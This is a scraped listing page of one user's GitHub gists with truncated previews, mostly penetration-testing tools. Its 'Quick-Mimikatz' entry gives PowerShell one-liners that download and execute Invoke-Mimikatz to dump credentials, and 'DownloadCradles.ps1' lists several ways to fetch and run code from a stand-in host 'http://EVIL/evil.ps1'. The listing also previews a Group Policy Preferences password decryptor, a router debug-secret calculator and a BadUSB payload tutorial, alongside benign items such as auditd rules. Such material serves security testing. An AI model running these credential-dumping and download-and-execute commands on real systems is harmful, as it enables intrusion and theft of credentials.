@kost
kost / Quick-Mimikatz
Created Nov 14, 2018 — forked from gfoss/Quick-Mimikatz
Quick Mimikatz
View Quick-Mimikatz
*NOTE - These pull from public GitHub Repos that are not under my control. Make sure you trust the content (or better yet, make your own fork) prior to using!*
#mimikatz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Exfiltration/Invoke-Mimikatz.ps1'); $m = Invoke-Mimikatz -DumpCreds; $m
#encoded-mimikatz
powershell -enc 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
#mimikittenz
IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/putterpanda/mimikittenz/master
@kost
kost / audit.rules
Created Apr 26, 2018 — forked from Neo23x0/audit.rules
Linux Auditd Best Practice Configuration
View audit.rules
# ___ ___ __ __
# / | __ ______/ (_) /_____/ /
# / /| |/ / / / __ / / __/ __ /
# / ___ / /_/ / /_/ / / /_/ /_/ /
# /_/ |_\__,_/\__,_/_/\__/\__,_/
#
# Linux Audit Daemon - Best Practice Configuration
# /etc/audit/audit.rules
#
# Compiled by Florian Roth
@kost
kost / gpg-decrypt.rb
Created Nov 21, 2017
Group Policy Preferences (GPP) password decryption
View gpg-decrypt.rb
#!/usr/bin/env ruby
# This tool was released by Chris Gates on Friday, October 19, 2012
# Gemification by Kost
require 'rubygems'
require 'openssl'
require 'base64'
def decrypt(encrypted_data)
  padding = "=" * (4 - (encrypted_data.length % 4))
View import_json_appsscript.js
/**
* Retrieves all the rows in the active spreadsheet that contain data and logs the
* values for each row.
* For more information on using the Spreadsheet API, see
* https://developers.google.com/apps-script/service_spreadsheet
*/
function readRows() {
  var sheet = SpreadsheetApp.getActiveSheet();
  var rows = sheet.getDataRange();
  var numRows = rows.getNumRows();
@kost
kost / rotate
Created Apr 30, 2017 — forked from narongdejsrn/rotate
Python code to annoy your friend in Windows OS
View rotate
import win32com.client
import time
import itertools
shell = win32com.client.Dispatch("WScript.Shell")
curArr = ["RIGHT", "DOWN", "LEFT", "UP"]
for element in itertools.cycle(curArr):
    shell.SendKeys("^%{" + element + "}", 0)
View DownloadCradles.ps1
# normal download cradle
IEX (New-Object Net.Webclient).downloadstring("http://EVIL/evil.ps1")
# PowerShell 3.0+
IEX (iwr 'http://EVIL/evil.ps1')
# hidden IE com object
$ie=New-Object -comobject InternetExplorer.Application;$ie.visible=$False;$ie.navigate('http://EVIL/evil.ps1');start-sleep -s 5;$r=$ie.Document.body.innerHTML;$ie.quit();IEX $r
# Msxml2.XMLHTTP COM object
@kost
kost / bashbunnyquickstart.md
Last active Apr 8, 2017 — forked from tkisason/bashbunnyquickstart.md
BashBunny quickstart tutorial
View bashbunnyquickstart.md

Custom languages don't work without bbpayload.

  1. Fetch the bashbunny payloads:
     git clone https://github.com/hak5/bashbunny-payloads.git
  2. Slide the switch to arming position (all the way to the USB plug)
  3. Move contents of payloads/library/DuckyInstall to the payloads/switch1 directory in the bunny
View nessus-services.rb
#!/usr/bin/env ruby
# Filter Nessus XML report to get services identified
# Copyright (C) Kost
require 'nokogiri'
require 'optparse'
require 'logger'
require 'csv'
@kost
kost / zynsecrets.c
Created Mar 13, 2017
Calculate Bootbase/bootext secret for debug commands (ATEN 1,xxxx) - Zyxel, Huawei, ZTE, etc. - similar to zynpass but working for larger devices
View zynsecrets.c
/*
Calculate Bootbase/bootext secret for debug commands
Zyxel, Huawei, ZTE, etc.
Usage:
$ gcc zynsecrets.c -o zynsecrets
$ ./zynsecrets 000102030403
Copyright (C) Kost, https://gist.github.com/kost
View nvram
#!/bin/sh
# nvram emulation shell script (c) kost, https://gist.github.com/kost
#
# Usage (on real device dump the content): nvram show > /tmp/nvram.file
# Copy script and /tmp/nvram.file to the emulation env, start using it
# In case you just need nvram command emulation, just copy script.
#
# uncomment for debug:
# set -x